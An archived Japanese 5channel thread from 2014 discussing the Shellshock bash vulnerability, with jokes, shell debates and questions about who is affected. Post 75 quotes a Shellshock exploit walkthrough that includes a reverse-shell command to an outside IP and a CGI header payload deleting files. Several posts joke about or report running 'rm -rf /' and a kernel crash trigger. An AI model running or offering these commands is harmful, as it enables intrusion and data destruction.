5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【UNIX終了のお知らせ】 bashに重大な脆弱性、4月に問題になったHeartbleed越えの可能性も

1 : イス攻撃(大阪府)@転載は禁止:2014/09/25(木) 20:59:51.10 ID:wLFT0ut+0 ?PLT(12345) ポイント特典

UNIX系のソフト「bash」に重大バグ、システム乗っ取りも
ttp://jp.reuters.com/article/technologyNews/idJPKCN0HK06020140925

基本ソフト(OS)Linux(リナックス)上で広く使われているソフトウエア「bash」に、
新しくセキュリティー上のバグがあることが分かった。専門家らが24日警告した。
4月に発覚したオンラインのデータ暗号化ソフトのバグ「ハートブリード」より
大きな被害を引き起こす危険性があるという。

「bash」は、多くのUNIXベースのOSで動作するコマンドプロンプトを制御するためのソフト。
ハッカーはbashのバグを悪用して、システムを完全に乗っ取ることができるという。

米国土安全保障省のコンピューター緊急対応チーム(US―CERT)は、Linuxを含む
UNIXベースのOSや米アップル(AAPL.O: 株価, 企業情報, レポート)の
マックOS・X(テン)が影響を受ける危険性があるとの警告を発表した。

サイバーセキュリティー会社、トレイル・オブ・ビッツによると、
「ハートブリード」ではパスワードやクレジットカード情報などの個人情報が
盗まれる恐れはあったが、bashと異なりシステムを乗っ取ることはできなかった。

同社のダン・グイド最高経営責任者(CEO)は
「このバグを悪用するのは、ハートブリードよりはるかに簡単だ。
プログラムコードをカット&ペーストするだけで、望んだ結果が得られる」と述べた。
(略)

2 : ボマイェ(神奈川県)@転載は禁止:2014/09/25(木) 21:01:59.20 ID:oZQRJoPq0
Linux is not UNIX

3 : ラ ケブラーダ(東日本)@転載は禁止:2014/09/25(木) 21:02:41.30 ID:ohgk2eZZ0
busyboxでashな人は無関係な。

4 : 頭突き(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:03:23.60 ID:mKbSe1n20
korn shell でタブ補完する設定がどうしてもうまくいかないので
やむをえず bash を使う

5 : ジャンピングDDT(dion軍)@転載は禁止:2014/09/25(木) 21:05:32.40 ID:YUdNb5pq0
zshだし

6 : ツームストンパイルドライバー(広島県)@転載は禁止:2014/09/25(木) 21:07:25.63 ID:lSyaFq0N0
またLINEに不具合が出たのかと思った

7 : マシンガンチョップ(チベット自治区)@転載は禁止:2014/09/25(木) 21:09:06.06 ID:2bk8gjNJ0
UNIX板ならなんとかしてくれる

8 : バックドロップホールド(WiMAX)@転載は禁止:2014/09/25(木) 21:10:36.29 ID:JumuOGDA0
昨夜パッチ来てたな

9 : ラ ケブラーダ(大阪府)@転載は禁止:2014/09/25(木) 21:11:05.21 ID:9ezJ+xed0
C:\>

10 : ボマイェ(神奈川県)@転載は禁止:2014/09/25(木) 21:11:26.51 ID:oZQRJoPq0
既に大半のLinuxディストリビューションに対して、パッチ(CVE-2014-6271)
適用済みのバージョンが配信されているが、これでは不完全であるという
指摘があって、新たにCVE-2014-7169が公開されるかもしれない状態。

11 : セントーン(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:12:13.22 ID:4gwVl+wv0
zshだから余裕って人もrootのシェルはbashのままだったりするよね

12 : 膝靭帯固め(庭)@転載は禁止:2014/09/25(木) 21:12:31.86 ID:xKMBUhaA0
unixはkshです
bash使ってるとかどんなにわかだよ

13 : ラ ケブラーダ(大阪府)@転載は禁止:2014/09/25(木) 21:13:41.03 ID:9ezJ+xed0
command.com

14 : ジャンピングパワーボム(東京都)@転載は禁止:2014/09/25(木) 21:15:46.28 ID:rWnTJAQK0
バッシュがダメならダッカスにしちゃえばいいじゃん

15 : 不知火(庭)@転載は禁止:2014/09/25(木) 21:18:22.01 ID:wXAVybWq0
yum updateすればいいんですか?

16 : パイルドライバー(東京都)@転載は禁止:2014/09/25(木) 21:18:36.78 ID:QTWn4Bdx0
↓国防省に徒歩で侵入したスーパーハッカー

17 : 男色ドライバー(庭)@転載は禁止:2014/09/25(木) 21:19:21.75 ID:0PlHosth0
ls

18 : ダイビングヘッドバット(宮崎県)@転載は禁止:2014/09/25(木) 21:20:44.45 ID:3eSaE40H0
また2ちゃんを救ってくれるんだろ

19 : フランケンシュタイナー(大阪府)@転載は禁止:2014/09/25(木) 21:23:12.02 ID:AnspKtpI0
これか

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
Vulnerability Summary for CVE-2014-6271

Vulnerable software and versions
gnu bash 1.14.0-4.3

20 : ドラゴンスクリュー(空)@転載は禁止:2014/09/25(木) 21:23:49.35 ID:joC8DlCs0
さっぱりわからんのだけどUbuntu使わない方がいい?

21 : キン肉バスター(神奈川県)@転載は禁止:2014/09/25(木) 21:24:11.54 ID:Fe35McDr0
やべえええええええええええ、これパソコン先生レベルで簡単に鯖乗っ取れるじゃん・・・・
全世界の鯖が次々と踏み台化されてんだろ

22 : TEKKAMAKI(神奈川県)@転載は禁止:2014/09/25(木) 21:24:45.50 ID:s2x3dDo70
ksh派の攻撃だな

23 : ボ ラギノール(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:27:25.13 ID:yKkGCtNa0
bashでcgi書く奴は滅多に居ないだろうが
スクリプト言語のsystemやパイプも駄目となるとつらい

24 : ジャーマンスープレックス(広島県)@転載は禁止:2014/09/25(木) 21:29:33.76 ID:ftwYf/6W0
phpとかでexecあたり使ってても問題あるの?

25 : エルボーバット(大阪府)@転載は禁止:2014/09/25(木) 21:30:39.38 ID:Q4zaqMEd0
攻撃方法を知らないと防ぎ方も分からないんだけど。
こういう騒がれ方困る

26 : イス攻撃(宮城県)@転載は禁止:2014/09/25(木) 21:30:55.26 ID:mSYP8MeJ0
矛盾との戦いが人間の脳の本質か

27 : ボマイェ(神奈川県)@転載は禁止:2014/09/25(木) 21:32:18.51 ID:oZQRJoPq0
>>24
execでシェルを呼び出していればね。

28 : キン肉バスター(神奈川県)@転載は禁止:2014/09/25(木) 21:32:20.79 ID:Fe35McDr0
>>22
Perlもcgi経由だろ
Perlもダメなじゃないのか

29 : サソリ固め(熊本県)@転載は禁止:2014/09/25(木) 21:36:06.37 ID:lRKSKi660
cshとかtcshとかzshとか他にもたくさんあるやん

30 : ハーフネルソンスープレックス(SB-iPhone)@転載は禁止:2014/09/25(木) 21:40:37.33 ID:Oe+W68umi
su -
rm -r /

31 : ヒップアタック(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:40:41.17 ID:MWUidrKd0
>>24
環境変数引き継ぐ仕組みなら何でも対象にな?

32 : ミッドナイトエクスプレス(家)@転載は禁止:2014/09/25(木) 21:42:32.84 ID:pUWW+BF60
>>29
全てがそれで出来てるわけではないだろ

33 : マスク剥ぎ(WiMAX)@転載は禁止:2014/09/25(木) 21:42:33.25 ID:w/JhqXLH0
tcsh 大勝利

34 : チェーン攻撃(芋)@転載は禁止:2014/09/25(木) 21:42:36.90 ID:OAsGQkEF0
しーしぇるだろ普通

35 : ヒップアタック(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:48:23.48 ID:MWUidrKd0
シェル自慢大会になって現実問題放置すると織田裕二が警察無線で怒鳴るかな

36 : ジャンピングカラテキック(奈良県)@転載は禁止:2014/09/25(木) 21:49:25.44 ID:ebia1WyJ0
>>30
fが抜けてんぞ。あと念のため \ も。
\rm -rf /

37 : ミラノ作 どどんスズスロウン(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:50:29.32 ID:H46iRr1J0
何のシェル使ってるかわからないなら、

echo $SHELL

で確認できるゾ

38 : リキラリアット(東京都)@転載は禁止:2014/09/25(木) 21:55:21.77 ID:V2omTXCa0
/bin/sh

39 : ビッグブーツ(沖縄県)@転載は禁止:2014/09/25(木) 21:57:22.87 ID:BudSO2CF0
マックは安全なんやろ?

40 : ヒップアタック(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 21:58:47.35 ID:MWUidrKd0
>>39
デフォがbash
恐らく対応は一番最後になるだろうという予想

41 : グロリア(やわらか銀行)@転載は禁止:2014/09/25(木) 22:01:12.90 ID:TWYFw7w10
ログインシェルとはあんま関係ないだろ
cgiからコマンド呼び出しの時bash呼び出してる可能性があってそれが一番危ない

42 : ネックハンギングツリー(西日本)@転載は禁止:2014/09/25(木) 22:02:06.92 ID:W4sUwYiL0
お先マックら

43 : 男色ドライバー(catv?)@転載は禁止:2014/09/25(木) 22:06:49.17 ID:RUqDCR0b0
MacOSにsh付属してんの?

44 : レッドインク(catv?)@転載は禁止:2014/09/25(木) 22:09:04.39 ID:bHbgQ2Z70
>>36
youtubeにホントにそれやったらどうなるかって動画あったな

45 : ヒップアタック(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 22:10:04.15 ID:MWUidrKd0
>>43
付属してないから安心してスタバでドヤれ

46 : エルボーバット(チベット自治区)@転載は禁止:2014/09/25(木) 22:10:57.57 ID:EWaGDZ8s0
今どきはzshやろ

47 : チェーン攻撃(東京都)@転載は禁止:2014/09/25(木) 22:11:07.62 ID:AwUiOPuF0
OpenSSHだかもセキュリティホールがあったって、前騒いでいたよね
こういう昔からある枯れたプログラムにもセキュリティホールがあるんだねえ

48 : 逆落とし(愛知県)@転載は禁止:2014/09/25(木) 22:11:15.98 ID:ZEXEgDp50
UNIXやWindowsの脆弱性の多くが
パラメータが参照している変数の型をチェックしない
C言語の根本的な弱点に起因してるからな

プログラマとしては一流でも言語理論に関しては素人の作った言語

49 : ヒップアタック(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 22:12:50.66 ID:MWUidrKd0
>>47
そうスレタイに書いてあるな

50 : ストレッチプラム(茸)@転載は禁止:2014/09/25(木) 22:12:56.67 ID:SHb4crYg0
>オンラインのデータ暗号化ソフトのバグ「ハートブリード」より

ハートブリードってこんなんだったっけ

51 : チェーン攻撃(東京都)@転載は禁止:2014/09/25(木) 22:14:52.25 ID:AwUiOPuF0
どうしていままで誰も気付かなかったんだろう?

52 : 目潰し(東京都)@転載は禁止:2014/09/25(木) 22:16:18.07 ID:Eq0Mq+dG0
>>36
前にひっかかって大変な目にあったんだよ
やめてくれw

53 : イス攻撃(宮城県)@転載は禁止:2014/09/25(木) 22:16:18.54 ID:mSYP8MeJ0
ちょうどデータ解析にテキストをベーシックでやろうと思ってたところだった

54 : ニーリフト(四国地方)@転載は禁止:2014/09/25(木) 22:18:04.89 ID:3KITtDyX0
須藤さんがピンチと聞いて

55 : ツームストンパイルドライバー(西日本)@転載は禁止:2014/09/25(木) 22:23:51.80 ID:qkEfL5B+0
bashのaliasを変更すればいいって話じゃないの?
bashなんか標準で使われてるってだけでzshでも使うには問題ないんだから何が問題かわからん

56 : ニールキック(鹿児島県)@転載は禁止:2014/09/25(木) 22:24:41.22 ID:6ISFkCzN0
そういえば書きかけのシェルスクリプトがあったのを10年ぶりぐらいに思い出したw

57 : シューティングスタープレス(神奈川県)@転載は禁止:2014/09/25(木) 22:25:47.71 ID:OZwboZpa0
MacはMac portで修正したらいいだけか

58 : ミラノ作 どどんスズスロウン(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 22:26:36.21 ID:CTu7hl260
バッシュって厨二心がくすぐられるわ〜

59 : 張り手(広島県)@転載は禁止:2014/09/25(木) 22:26:54.34 ID:jCulMXzL0
普通tcshだし

60 : 張り手(広島県)@転載は禁止:2014/09/25(木) 22:29:05.40 ID:jCulMXzL0
汗れぇ〜すべーるbash

61 : レッドインク(catv?)@転載は禁止:2014/09/25(木) 22:34:55.58 ID:bHbgQ2Z70
>>57
10.6.8のexprのバグはどうすればいい?

62 : バックドロップ(チベット自治区)@転載は禁止:2014/09/25(木) 22:34:59.20 ID:ajez3Dlu0
>>30
sudo su -
rm -rf /

で行けました。ありがとうございます。

63 : ジャンピングエルボーアタック(家)@転載は禁止:2014/09/25(木) 22:41:47.15 ID:RKqWOHBW0
MacOSてことは、iOSもヤバイじゃん

64 : ジャンピングエルボーアタック(家)@転載は禁止:2014/09/25(木) 22:42:42.52 ID:RKqWOHBW0
>>30
おい
やめろ

65 : シューティングスタープレス(神奈川県)@転載は禁止:2014/09/25(木) 22:46:41.49 ID:OZwboZpa0
>>61
なんぞそれ?
Lionからのユーザーなので知らぬ

66 : ダイビングエルボードロップ(愛知県)@転載は禁止:2014/09/25(木) 22:47:24.79 ID:G3+fpfim0
ここまでコード無し

67 : 逆落とし(愛知県)@転載は禁止:2014/09/25(木) 22:49:11.66 ID:ZEXEgDp50
―――――――

68 : サソリ固め(SB-iPhone)@転載は禁止:2014/09/25(木) 22:51:08.51 ID:BOsqFShLi
所でlinuxでなにしてるの?

69 : 張り手(広島県)@転載は禁止:2014/09/25(木) 22:55:07.76 ID:jCulMXzL0
>>68
中小企業なんかで1つのメアドを共用してたりすると、fechmailとqpopperとか使ってメールを社内サーバに取り込むと
劇的にトラフィックが減らせてインターネットが快適になったりする。

70 : レッドインク(catv?)@転載は禁止:2014/09/25(木) 22:55:08.96 ID:bHbgQ2Z70
>>65
$ expr "/001.txt" : '.*/\(.*\)\.'
ってやると普通は
001
になるんだけど10.6.8だと
1
になっちゃう

71 : ハイキック(やわらか銀行)@転載は禁止:2014/09/25(木) 22:58:06.56 ID:KSNrusnL0
>>68
USBとCDにイメージを焼いてレスキュー用途に使うとか。


初心者の戯れ言で申し訳ない

72 : ニールキック(やわらか銀行)@転載は禁止:2014/09/25(木) 22:59:00.99 ID:SaKfUQCe0
ああ
macですね

73 : アルゼンチンバックブリーカー(庭)@転載は禁止:2014/09/25(木) 23:02:27.72 ID:z5nRbaZ/0
>>68
猿のようにエロを周回して
適当に入れ直す

74 : 魔神風車固め(東京都)@転載は禁止:2014/09/25(木) 23:02:42.43 ID:4Ts9Xvrj0
cd nanpa
nanpa

75 : ブラディサンデー(東京都)@転載は禁止:2014/09/25(木) 23:03:52.06 ID:dBtnGuCU0
これマジでやばくね?対象機器多すぎだろ・・・Androidもやばいんじゃね

なんでもいいのでLinuxホストのターミナルでこんなコマンドを打ってみましょう:
$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi'

もし出力の中にmanukeが含まれていたら、そのホストは今回発表された脆弱性に対して危険な状態です。
もうちょっとゾクッと来る例を紹介しましょう。

Gitoliteなど、シェルを提供しないという条件付きでSSHの接続を受け付けるタイプのアプリケーションがありますが、
この脆弱性を突くと、シェルを与えていないユーザに好き放題されてしまうかもしれません。

あるGitoliteサーバ (gitolite.example.com) にアカウントを持っている攻撃者が自分のホストから
$ ssh git@gitolite.example.com '() { :; }; /usr/bin/id'

というコマンドを発射します。そして、
uid=108(git) gid=114(git) groups=114(git)

と返ってくると、攻撃は成功です。
$ ssh git@gitolite.example.com '() { :; }; bash -i >& /dev/tcp/203.0.113.1/4444 0>&1'

というコマンドを撃てば、203.0.113.1:4444にリバースシェルが降ってきますね(*1)。

もうひとつヤバい例を挙げましょう。CGIです。
CGIにおけるアタックベクタは、環境変数に格納されるパラメータです。 system()や類似の関数を用いたCGIスクリプトは、
OSコマンド実行のためにbashを呼び出しているかもしれません。
CGIはパラメータを環境変数として格納しています(*2)から、HTTPリクエストヘッダをいじって
User-Agent: () { :; }; rm -rf /

とかやるとゾクゾクするかもしれません。わたしは実証していませんが。

76 : 毒霧(東京都)@転載は禁止:2014/09/25(木) 23:04:33.35 ID:XVyGZzS30
日本人FreeBSDユーザーって本物志向なのになんで、OpenIndiana使わないの?
ていうかなんで誰もOIの開発に携わらないの?
一応本物だよ。本物。

77 : 河津落とし(庭)@転載は禁止:2014/09/25(木) 23:05:34.43 ID:Gznf+5ll0
echo "c" > /proc/sysrq-trigger

78 : ダイビングエルボードロップ(神奈川県)@転載は禁止:2014/09/25(木) 23:06:54.25 ID:zJSuuaR00
またブッシュか・・

79 : トペ スイシーダ(埼玉県)@転載は禁止:2014/09/25(木) 23:07:50.26 ID:R6BQ3jRk0
 
もうアップデートしたし
 
 

80 : エメラルドフロウジョン(庭)@転載は禁止:2014/09/25(木) 23:09:56.82 ID:CN9b8cKN0
>>62
お前は何をしたんだ

81 : マスク剥ぎ(WiMAX)@転載は禁止:2014/09/25(木) 23:12:00.28 ID:w/JhqXLH0
>>75
>$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi'

これはコンパイラ理論のahoさんと関係があるんでしょうか

82 : 閃光妖術(北海道)@転載は禁止:2014/09/25(木) 23:12:21.21 ID:We1gTgsY0
最近作られたサービスだとあんま該当しなさそうだけど
2ちゃんこそUNIX系OSにPerlのCGIでアウトだよな
おまえら不正アクセスは犯罪だからやるなよ

83 : オリンピック予選スラム(東京都)@転載は禁止:2014/09/25(木) 23:23:32.81 ID:ZjfYqNdB0
2chのサーバにはインスコすらされてないかもよ、bash

84 : ハイキック(東京都)@転載は禁止:2014/09/25(木) 23:23:40.22 ID:FKHVWPuQ0
>>82
これでひろゆきが取り返したら笑うけどな。

85 : ムーンサルトプレス(庭)@転載は禁止:2014/09/25(木) 23:30:00.57 ID:RBJvYTXq0
BshでviでVT100使いの俺に死角はなかった

86 : ヒップアタック(新疆ウイグル自治区)@転載は禁止:2014/09/25(木) 23:35:15.70 ID:MWUidrKd0
>>82
Perlだけじゃない
phpやpythonでも起きる

87 : ダイビングエルボードロップ(神奈川県)@転載は禁止:2014/09/25(木) 23:37:18.82 ID:zJSuuaR00
リナックスなんか関係ないやって思ったがXP終了の時ubuntuにしたんだった。
まんどくせ・・

88 : シャイニングウィザード(やわらか銀行)@転載は禁止:2014/09/25(木) 23:59:02.45 ID:yMGliX8F0
>>86
起きるのはperlやpythonからbash呼び出してる時だけだろ

89 : リバースパワースラム(神奈川県)@転載は禁止:2014/09/25(木) 23:59:30.88 ID:LeLZjN7Y0
よく分かってないんだけど、
ブラウザからヤバい引数付でbashなcgi(存在するとして)を入れられて
そのまま動いちゃうホストだと世界中から狙われるという事??

90 : ファイナルカット(新疆ウイグル自治区)@転載は禁止:2014/09/26(金) 00:01:54.60 ID:piosWK7d0
>>89
そう

91 : レインメーカー(神奈川県)@転載は禁止:2014/09/26(金) 00:08:44.64 ID:1hWHVW/00
>>90
ども

92 : ラダームーンサルト(庭)@転載は禁止:2014/09/26(金) 00:12:01.80 ID:PEw/ffTT0
懐かしすぎワロタ

93 : カーフブランディング(やわらか銀行)@転載は禁止:2014/09/26(金) 00:17:11.30 ID:86vOs3xU0
WindowsでもSFUやCygwinでbashが使えるが、どうやらアウトっぽい

94 : 16文キック(catv?)@転載は禁止:2014/09/26(金) 00:24:33.55 ID:ZoKvanlY0
>>82
・2chの鯖はFreeBSD
・FreeBSDの標準シェルはtcsh
・ports使ってわざわざ入れてなければbashは2chの鯖にはない

95 : ブラディサンデー(神奈川県)@転載は禁止:2014/09/26(金) 00:54:13.40 ID:LPAfXExq0
>>2
再帰的略称ってか?

96 : ファイヤーボールスプラッシュ(東日本)@転載は禁止:2014/09/26(金) 00:56:44.33 ID:h94XXw2R0
>>37
/bin/bashだって
ウッヒョ-

97 : 目潰し(滋賀県)@転載は禁止:2014/09/26(金) 00:57:49.38 ID:INilLBiu0
基本ソフトじゃん
こえぇwww

98 : メンマ(新疆ウイグル自治区)@転載は禁止:2014/09/26(金) 01:02:16.74 ID:KFjyNAa/0
外からアクセスできるweb鯖立ててなければ大丈夫だろ

99 : ボ ラギノール(やわらか銀行)@転載は禁止:2014/09/26(金) 01:29:44.64 ID:1uPNNkfC0
誰だよUNIXはセキュリティ高いとか言ってた奴

100 : バックドロップホールド(東京都)@転載は禁止:2014/09/26(金) 01:31:48.94 ID:TAnexKkJ0
# /sbin/loli

101 : カーフブランディング(やわらか銀行)@転載は禁止:2014/09/26(金) 04:04:29.26 ID:86vOs3xU0
>>39
10.3 10.4 のデフォルトシェルが bash
それ以外はtcshがデフォルト

102 : 腕ひしぎ十字固め(やわらか銀行)@転載は禁止:2014/09/26(金) 04:15:44.12 ID:ifbwl88M0
bashならアンインストールしちゃえば平気じゃね?
スクリプトをbashで作ってるシステムなんて見たことないわ。
作業で使うからマニュアル関係は問題があるかも知れんが、bash固有操作まで記載しないしなあ。

103 : キドクラッチ(茨城県)@転載は禁止:2014/09/26(金) 04:19:10.61 ID:CZsq/MRB0
なーるほこうやってwindows9に誘導していく訳ねーわっかりやすー( ´,_ゝ`)プッ

104 : テキサスクローバーホールド(内モンゴル自治区)@転載は禁止:2014/09/26(金) 04:22:07.31 ID:fvKnA5I4O
複数の目で見てるLinuxにセキュリティホールなんてあるわけないのにマイクロソフト必死にデマ拡散www

105 : トラースキック(チベット自治区)@転載は禁止:2014/09/26(金) 04:27:52.74 ID:DlCsEltR0
カットアンドペーストとか初めて聞いたわ

106 : ビッグブーツ(栃木県)@転載は禁止:2014/09/26(金) 05:54:55.18 ID:dBst6ZJI0
bash→キモオタ
csh→クズ
ksh→変態

zsh→イケメン

107 : ヒップアタック(空)@転載は禁止:2014/09/26(金) 06:30:14.21 ID:7RCzDmNn0
とっくに
pacman -Syuしてる俺に死角はなかった

108 : ヒップアタック(空)@転載は禁止:2014/09/26(金) 06:34:54.02 ID:7RCzDmNn0
>>99
しかし発見者が同時にパッチを作成している

109 : タイガースープレックス(dion軍)@転載は禁止:2014/09/26(金) 06:37:52.32 ID:a307yB1K0
t、tcshだから・・・

110 : タイガースープレックス(dion軍)@転載は禁止:2014/09/26(金) 06:40:45.41 ID:a307yB1K0
sudo信者が、#出したら負けやねん、rootになったら負けやねん、って
必死に布教活動してたのを思い出す
八王子のお前だよ、アーロン持ち込んでたお前

111 : 垂直落下式DDT(千葉県)@転載は禁止:2014/09/26(金) 06:42:23.78 ID:CV6E5BN80
OSX(エックス)って呼んでたよ

112 : エクスプロイダー(チベット自治区)@転載は禁止:2014/09/26(金) 06:43:26.22 ID:IvnZC++A0
OSXオワタ(´・_・`)

113 : ダブルニードロップ(千葉県)@転載は禁止:2014/09/26(金) 06:44:51.33 ID:sYW4LNcD0
>>30
こんな簡単な操作でシステムが崩壊するなんて
欠陥OSだよな。マジで。。

114 : ヒップアタック(空)@転載は禁止:2014/09/26(金) 06:44:52.17 ID:7RCzDmNn0
でもさ、あんまりbashをcgiだとかネットで使わんよね

115 : クロスヒールホールド(埼玉県)@転載は禁止:2014/09/26(金) 06:45:28.98 ID:GthY0cC70
cygwinちゃんも危ないの?

116 : ヒップアタック(香川県)@転載は禁止:2014/09/26(金) 06:46:28.92 ID:cleKZhgh0
おれのナイキが

117 : パロスペシャル(catv?)@転載は禁止:2014/09/26(金) 06:49:37.02 ID:vfZJZkc00
回転寿しのタッチメニューにブラクラ仕込んだり出来るの?

118 : ボマイェ(愛知県)@転載は禁止:2014/09/26(金) 06:50:03.22 ID:+J4K88Za0
CyanogenModおわた

119 : エクスプロイダー(チベット自治区)@転載は禁止:2014/09/26(金) 06:50:56.10 ID:IvnZC++A0
>>30
実行したらデータ全部消えたわ(´;ω;`)

120 : フルネルソンスープレックス(関東・甲信越)@転載は禁止:2014/09/26(金) 07:04:09.57 ID:e8w+4wSAO
UNIX/Linuxは素性が善意のシステムだからなー

121 : ドラゴンスープレックス(内モンゴル自治区)@転載は禁止:2014/09/26(金) 07:10:09.75 ID:fvKnA5I4O
シェルがbashじゃなくてよかったとおもってるやつ、それ実体はbashのリンクだぞ

122 : ストレッチプラム(空)@転載は禁止:2014/09/26(金) 07:13:42.01 ID:Xz0ZseKhi
脆弱性の件で電話したら「知らない、関係無い」の一点張り。
本当にクソだわLIXILは。

123 : 男色ドライバー(新疆ウイグル自治区)@転載は禁止:2014/09/26(金) 07:13:42.88 ID:lflKy6Gf0
>>81
もしかしてaho-corasickのaho?

124 : アルゼンチンバックブリーカー(SB-iPhone)@転載は禁止:2014/09/26(金) 07:16:14.15 ID:Eu6zg07Li
やっぱりWindowsが一番だな

125 : フォーク攻撃(関東地方)@転載は禁止:2014/09/26(金) 07:17:49.46 ID:Nhb+tKZEO
これ実体は埋め込みLinuxのファームウェアとかも危ない?

126 : スパイダージャーマン(空)@転載は禁止:2014/09/26(金) 07:19:00.21 ID:gfGhJxI20
よく分かんねーやつはケーブル全部引っこ抜いとけ

127 : セントーン(SB-iPhone)@転載は禁止:2014/09/26(金) 07:31:28.06 ID:a5e9/N5ii
鯖屋以外にはほぼ無関係なんじゃないのこれ

128 : ヒップアタック(空)@転載は禁止:2014/09/26(金) 07:36:26.40 ID:7RCzDmNn0
つか、笑えるほど、なぜ発見されてなかったんだ?
と言えるくらい、ひどい単純なバグだなwww

129 : マシンガンチョップ(神奈川県)@転載は禁止:2014/09/26(金) 07:39:16.43 ID:8XBGxO7A0
>>125
組み込みの場合はbashなんて巨大なバイナリを入れたりしないので、
ほとんど関係ない。大抵はbusyboxのashだ。

130 : イス攻撃(東日本)@転載は禁止:2014/09/26(金) 08:18:20.92 ID:guwIKhx3O
ここまで例のコピペなし

131 : ドラゴンスープレックス(SB-iPhone)@転載は禁止:2014/09/26(金) 08:58:11.61 ID:kT0G+muui
>>12
業界の主流はbshなんだよなぁ。浅い知識。

にわかがばれちゃったねw

132 : ドラゴンスクリュー(新潟県)@転載は禁止:2014/09/26(金) 09:14:46.66 ID:Tue1hY7l0
cshしか知らない

133 : キチンシンク(神奈川県)@転載は禁止:2014/09/26(金) 09:32:44.68 ID:Tlipcx0W0
'.*/\(.*\)\.' アチャー

134 : ダイビングフットスタンプ(公衆電話)@転載は禁止:2014/09/26(金) 09:34:47.83 ID:m0NxGno80
UNIXって事はWindowsやMacも終わりか
WindowsはMS-DOSからUNIXに移行したし

135 : 頭突き(SB-iPhone)@転載は禁止:2014/09/26(金) 10:01:06.20 ID:emHPiZk+i
>>97
は?

136 : ウエスタンラリアット(東京都)@転載は禁止:2014/09/26(金) 10:07:29.11 ID:CATCz6qc0
>>134
Services for Unixってcshとkshだったような。

137 : 不知火(庭)@転載は禁止:2014/09/26(金) 10:14:03.91 ID:jziJ4AXH0
>>12
AIXユーザーでつか?

138 : ラ ケブラーダ(公衆電話)@転載は禁止:2014/09/26(金) 10:16:18.79 ID:0Z7q6YS90
ウェブサーバにアクセスしてもbashなんか使わんだろ
だからOpenSSLの件とは影響度が桁違い

139 : ウエスタンラリアット(東京都)@転載は禁止:2014/09/26(金) 10:22:53.72 ID:CATCz6qc0
>>138
CGIでシェルを介して様々なことをやってたりすることも多数ある。

140 : ファイナルカット(新疆ウイグル自治区)@転載は禁止:2014/09/26(金) 10:23:17.47 ID:piosWK7d0
>>138
うん、こっちの方が桁違いに高いね

141 : キチンシンク(神奈川県)@転載は禁止:2014/09/26(金) 10:25:00.59 ID:Tlipcx0W0
C compiler の存在が怖い

142 : ウエスタンラリアット(東京都)@転載は禁止:2014/09/26(金) 10:26:56.32 ID:CATCz6qc0
>>138
追記。
今回のセキュリティホールは、環境変数に入った値をコマンドとして実行してしまうので、
CGIであればクエリ文字列にコマンドを仕掛ければ、簡単に実行させることが出来てしまう。

143 : フライングニールキック(WiMAX)@転載は禁止:2014/09/26(金) 10:30:08.70 ID:6WzJUZBh0
>>131がにわか過ぎて吹いたwww

144 : 張り手(禿)@転載は禁止:2014/09/26(金) 10:32:10.79 ID:zyeT7pgTi
メンテ用のアカウント以外はリモートからのシェルアクセス塞いどきゃよくね?

145 : バックドロップ(神奈川県)@転載は禁止:2014/09/26(金) 10:32:36.70 ID:MulRHyIN0
>>101
いや10.2までがtcshで以降はbash
つーかOSXは/bin/shがbashだから、ログインシェルがbashじゃなくても
systemとかでコマンド呼び出すだけで引っかかるよ

146 : ジャストフェイスロック(庭)@転載は禁止:2014/09/26(金) 10:42:07.79 ID:LXACvC810
>>143
ニワカつーか、何を言ってるのか掴めなかった
bshとか一番意味が伝わらないつーか、本当にbshの事なのか、Bourne Shellをbshと書いたのか、bashを書き間違えたのかなどなど

147 : フロントネックロック(広島県)@転載は禁止:2014/09/26(金) 12:42:15.53 ID:r/hFpAcf0
>>139
その場合はshじゃないか

148 : 張り手(禿)@転載は禁止:2014/09/26(金) 13:03:49.95 ID:zyeT7pgTi
>>147
たいていのLinuxの場合はshはbashのsymlinkだったりする

149 : 垂直落下式DDT(やわらか銀行)@転載は禁止:2014/09/26(金) 13:21:23.82 ID:OXmxbiix0
bourne shell を bシェルということがたまにある。たまに見かける。

150 : フロントネックロック(広島県)@転載は禁止:2014/09/26(金) 13:57:05.92 ID:r/hFpAcf0
>>148
あれ呼び出し方で動作変わるんじゃなかったっけ? sh相当の動作でも脆弱性あるのかな。

151 : キャプチュード(東京都)@転載は禁止:2014/09/26(金) 17:00:04.30 ID:BAuKcSxP0
RedHatはパッチがきたっぽいな。

152 : キャプチュード(東京都)@転載は禁止:2014/09/26(金) 17:22:44.31 ID:BAuKcSxP0
>>150
同じだよ。だからこそ大問題なわけだ。

153 : 超竜ボム(広島県)@転載は禁止:2014/09/26(金) 18:55:36.36 ID:f32HY6k+0
>>152
なるほど。そりゃ大問題だ。
Linuxなんか使うからこーなる。

154 : サッカーボールキック(庭)@転載は禁止:2014/09/26(金) 20:09:34.79 ID:7R6rE0GI0
bashの置き換えで済むの?

155 : キチンシンク(catv?)@転載は禁止:2014/09/26(金) 20:11:53.98 ID:aZg0Ioaz0
RedHat系はsh == bashだが、Debian系のshはdashという別の実装になっている

156 : キドクラッチ(西日本)@転載は禁止:2014/09/26(金) 22:19:01.19 ID:qFe1LyGz0
>>155
それで何度かハマったことがある
#!/bin/bash
と書く癖がついた

157 : パロスペシャル(WiMAX)@転載は禁止:2014/09/26(金) 23:49:15.93 ID:4xCzP7TB0
>>150
remshとrsh(リストリックシェル)がちがうとかあるな

158 : かかと落とし(東京都)@転載は禁止:2014/09/27(土) 00:12:44.80 ID:jVW3Za5v0
>>150
shという名前で実行されるとBourne Shellをエミュレートしてbashの拡張が
無効になると言うね
今回の件では関係なかったんかね

159 : 32文ロケット砲(長野県)@転載は禁止:2014/09/27(土) 00:46:39.32 ID:NZ0junBJ0
>>81
アホーとは 俺の事かと エイホ言い

